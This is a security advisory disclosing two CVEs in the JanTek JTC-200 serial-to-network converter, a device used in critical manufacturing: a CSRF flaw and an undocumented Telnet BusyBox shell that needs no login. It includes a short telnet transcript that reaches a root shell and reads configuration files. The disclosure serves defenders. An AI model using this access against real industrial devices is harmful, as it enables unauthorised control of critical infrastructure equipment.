JanTek JTC-200 RS232-NET Connector CSRF / Missing Authentication

`Vendor: JanTek  
Equipment: JTC-200  
Vulnerabilities: Cross-site Request Forgery, Improper Authentication  
  
Advisory URL:  
https://ipositivesecurity.com/2017/10/28/ics-jantek-jtc-200-rs232-net-converter-advisory-published/  
  
ICS-CERT Advisory  
https://ics-cert.us-cert.gov/advisories/ICSA-17-283-02  
  
CVE-ID  
CVE-2016-5789  
CVE-2016-5791  
  
Detailed Proof of Concept:  
https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/  
  
------------------------  
AFFECTED PRODUCTS  
------------------------  
  
The following versions of JTC-200, a TCP/IP converter, are affected:  
JTC-200 all versions.  
  
------------------------  
BACKGROUND  
------------------------  
Critical Infrastructure Sectors: Critical Manufacturing  
Countries/Areas Deployed: Europe and Asia  
Company Headquarters Location: Taiwan  
  
  
------------------------  
IMPACT  
------------------------  
Successful exploitation of these vulnerabilities allow for remote code  
execution on the device with elevated privileges.  
  
------------------------  
VULNERABILITY OVERVIEW  
------------------------  
  
CROSS-SITE REQUEST FORGERY (CSRF) CWE-352  
An attacker could perform actions with the same permissions as a victim  
user, provided the victim has an active session and is induced to trigger  
the malicious request.  
  
CVE-2016-5789 has been assigned to this vulnerability. A CVSS v3 base score  
of 8.0 has been assigned; the CVSS vector string is  
(AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).  
  
IMPROPER AUTHENTICATION CWE-287  
The improper authentication could provide undocumented Busybox Linux shell  
accessible over Telnet service without any authentication.  
  
CVE-2016-5791 has been assigned to this vulnerability. A CVSS v3 base score  
of 9.8 has been assigned; the CVSS vector string is  
(AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).  
  
---------  
Trying IP...  
Connected to IP.  
Escape character is '^]'.  
BusyBox v0.60.4 (2008.02.21-16:59+0000) Built-in shell (msh)  
Enter 'help' for a list of built-in commands.  
#  
BusyBox v0.60.4 (2008.02.21-16:59+0000) multi-call binary  
Usage: busybox [function] [arguments]...  
or: [function] [arguments]...  
BusyBox is a multi-call binary that combines many common Unix utilities into a single executable. Most people will create a link to busybox for each function they wish to use, and BusyBox will act like whatever it was invoked as.  
Currently defined functions:  
[, busybox, cat, cp, df, hostname, ifconfig, init, kill, killall, ls, mkdir, mknod, mount, msh, mv, ping, ps, pwd, rm, sh, test, touch, vi  
#  
# ls  
bin dev etc nfs proc swap usb var  
# cd etc  
# ls  
ConfigPage WRConfig.ini config inetd.conf inittab ppp protocols rc resolv.conf services  
# cat inetd.conf  
telnet stream tcpnowait root /bin/telnetd  
#  
---------  
  
------------------------  
Technical Details  
------------------------  
https://ipositivesecurity.com/2016/07/05/rs232-net-converter-model-jtc-200-multiple-vulnerabilities/  
  
+++++  
Best Regards,  
Karn Ganeshen  
  
  
`